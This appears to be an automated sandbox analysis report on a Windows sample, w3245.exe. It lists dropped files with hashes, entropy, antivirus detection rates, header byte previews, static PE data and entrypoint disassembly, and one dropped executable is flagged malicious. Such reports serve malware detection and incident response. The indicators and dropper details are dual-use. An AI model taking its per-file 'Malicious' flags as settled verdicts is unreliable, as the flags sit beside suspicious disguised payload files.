                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j....O...O...O..S../O...o..*O...o..,O...O..+O...O..N..LP..?O..om..=O...I../O...o../O..Rich.O..........PE..L....wCB...........!.........0......I..............[.................................M.................................../..d...........X.......................L... ................................................................................text...0........................... ..`.rdata..L_.......`..................@..@.data...l...........................@....rsrc...X...........................@..@.reloc........... ..................@..B.wCB`....wCBm....wCBw....wCB.....wCB.....wCB.....wCB.....wCB.....wCB.....wCB....^xCB............KERNEL32.dll.NTDLL.DLL.USER32.dll.GDI32.dll.WINSPOOL.DRV.comdlg32.dll.COMCTL32.dll.ADVAPI32.dll.SHELL32.dll.VERSION.dll.MSVCRT.dll..............................................................................................

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtCore4.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2598912
                                                                                                                                                            Entropy (8bit):6.6049974235008655
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                            MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                            SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                            SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                            SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtGui4.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8581632
                                                                                                                                                            Entropy (8bit):6.736578346160889
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                            MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                            SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                            SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                            SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtNetwork4.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1053696
                                                                                                                                                            Entropy (8bit):6.539052666912709
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                            MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                            SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                            SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                            SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtXml4.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):356352
                                                                                                                                                            Entropy (8bit):6.447802510709224
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                            MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                            SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                            SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                            SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6487736
                                                                                                                                                            Entropy (8bit):7.518089126573906
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                            MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                            SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                            SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                            SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\StarBurn.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):664064
                                                                                                                                                            Entropy (8bit):6.953961612144461
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                            MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                            SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                            SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                            SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\hypochondriac.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60283
                                                                                                                                                            Entropy (8bit):4.569551839311306
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                            MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                            SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                            SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                            SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcp100.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):421200
                                                                                                                                                            Entropy (8bit):6.59808962341698
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                            MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                            SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                            SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                            SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):770384
                                                                                                                                                            Entropy (8bit):6.908020029901359
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                            MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                            SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                            SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                            SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\wiggery.bmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4567853
                                                                                                                                                            Entropy (8bit):7.952114001019503
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
                                                                                                                                                            MD5:30152DF1AEA607F1159EFEEAC2B8CED1
                                                                                                                                                            SHA1:E290B0553638EE68EB68C1CCE1062C733906EC9B
                                                                                                                                                            SHA-256:5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
                                                                                                                                                            SHA-512:94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp

                                                                                                                                                            C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\w3245.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):15692672
                                                                                                                                                            Entropy (8bit):7.995895236161738
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXjy:sRcqetYMe6dgB4QoxwgD/jy
                                                                                                                                                            MD5:EC4072E1AE2A9316270E6AFD66235A97
                                                                                                                                                            SHA1:EC499500172CA2CC76C5B30ECA34FCEB9BACCE0D
                                                                                                                                                            SHA-256:C5056AC95A2002BC08CB0EC8DBF064F78DFF400642EC1A6FC2A132984A7C1D99
                                                                                                                                                            SHA-512:80A87456A9B2AE9344F42A2F09F29B4CBCDBDA61418270EF1BAF11399C7E0FAC0C6A95D51682BA6205DB908B84E17D7C4A3FF78EBAC3EFEC75F5298B56CBEB7A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@.............................................$:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc...$:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Entropy (8bit):7.995926722079058
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:w3245.exe
                                                                                                                                                            File size:15'806'278 bytes
                                                                                                                                                            MD5:e92b4d3ee13da899ea0ad5b54a0094ed
                                                                                                                                                            SHA1:6068b49ac36eb618d20f5b3b4efad1d9bac68f5b
                                                                                                                                                            SHA256:97abaf743b7b33aa0f0c6ab83527cc253c9e231c4e68da5d9a42fc45ef655877
                                                                                                                                                            SHA512:de2156ba0bd71f3cd30bd9c2bbed9e1a4417c747252bb0c3205097b6a6ff45dfe5c4dd94650efbe635d5bd821172756f261dab42b998c7e4cd158e206f678bbd
                                                                                                                                                            SSDEEP:393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXj2:sRcqetYMe6dgB4QoxwgD/j2
                                                                                                                                                            TLSH:22F63332A534403AE7F50577EE29A2347E78E320575189BBE2D4FD0A6DB4489A7F3213
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:2d2e3797b32b2b99

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x42e2a6
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:5
                                                                                                                                                            OS Version Minor:1
                                                                                                                                                            File Version Major:5
                                                                                                                                                            File Version Minor:1
                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                            Import Hash:d7e2fd259780271687ffca462b9e69b7

                                                                                                                                                            Entrypoint Preview

                                                                                                                                                            Instruction
                                                                                                                                                            call 00007F6F7CB07A7Fh
                                                                                                                                                            jmp 00007F6F7CB073F3h
                                                                                                                                                            mov eax, dword ptr [esp+08h]
                                                                                                                                                            mov ecx, dword ptr [esp+10h]
                                                                                                                                                            or ecx, eax
                                                                                                                                                            mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                            jne 00007F6F7CB0756Bh
                                                                                                                                                            mov eax, dword ptr [esp+04h]
                                                                                                                                                            mul ecx
                                                                                                                                                            retn 0010h
                                                                                                                                                            push ebx
                                                                                                                                                            mul ecx
                                                                                                                                                            mov ebx, eax
                                                                                                                                                            mov eax, dword ptr [esp+08h]
                                                                                                                                                            mul dword ptr [esp+14h]
                                                                                                                                                            add ebx, eax
                                                                                                                                                            mov eax, dword ptr [esp+08h]
                                                                                                                                                            mul ecx
                                                                                                                                                            add edx, ebx
                                                                                                                                                            pop ebx
                                                                                                                                                            retn 0010h
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            cmp cl, 00000040h
                                                                                                                                                            jnc 00007F6F7CB07577h
                                                                                                                                                            cmp cl, 00000020h
                                                                                                                                                            jnc 00007F6F7CB07568h
                                                                                                                                                            shrd eax, edx, cl
                                                                                                                                                            shr edx, cl
                                                                                                                                                            ret
                                                                                                                                                            mov eax, edx
                                                                                                                                                            xor edx, edx
                                                                                                                                                            and cl, 0000001Fh
                                                                                                                                                            shr eax, cl
                                                                                                                                                            ret
                                                                                                                                                            xor eax, eax
                                                                                                                                                            xor edx, edx
                                                                                                                                                            ret
                                                                                                                                                            push ebp
                                                                                                                                                            mov ebp, esp
                                                                                                                                                            jmp 00007F6F7CB0756Fh
                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                            call 00007F6F7CB0DDECh
                                                                                                                                                            pop ecx
                                                                                                                                                            test eax, eax
                                                                                                                                                            je 00007F6F7CB07571h
                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                            call 00007F6F7CB0DE75h
                                                                                                                                                            pop ecx
                                                                                                                                                            test eax, eax
                                                                                                                                                            je 00007F6F7CB07548h
                                                                                                                                                            pop ebp
                                                                                                                                                            ret
                                                                                                                                                            cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                                                            je 00007F6F7CB07E04h
                                                                                                                                                            jmp 00007F6F7CB07DE1h
                                                                                                                                                            push ebp
                                                                                                                                                            mov ebp, esp
                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                            call 00007F6F7CB07E1Dh
                                                                                                                                                            pop ecx
                                                                                                                                                            pop ebp
                                                                                                                                                            ret
                                                                                                                                                            push ebp
                                                                                                                                                            mov ebp, esp
                                                                                                                                                            test byte ptr [ebp+08h], 00000001h
                                                                                                                                                            push esi
                                                                                                                                                            mov esi, ecx
                                                                                                                                                            mov dword ptr [esi], 00460DB8h
                                                                                                                                                            je 00007F6F7CB0756Ch
                                                                                                                                                            push 0000000Ch
                                                                                                                                                            push esi
                                                                                                                                                            call 00007F6F7CB0753Dh
                                                                                                                                                            pop ecx
                                                                                                                                                            pop ecx
                                                                                                                                                            mov eax, esi
                                                                                                                                                            pop esi
                                                                                                                                                            pop ebp

                                                                                                                                                            Rich Headers

                                                                                                                                                            Programming Language:
                                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                                            • [IMP] VS2008 SP1 build 30729

                                                                                                                                                            Data Directories

                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x686b40xb4.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x3a24.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x3dfc.reloc
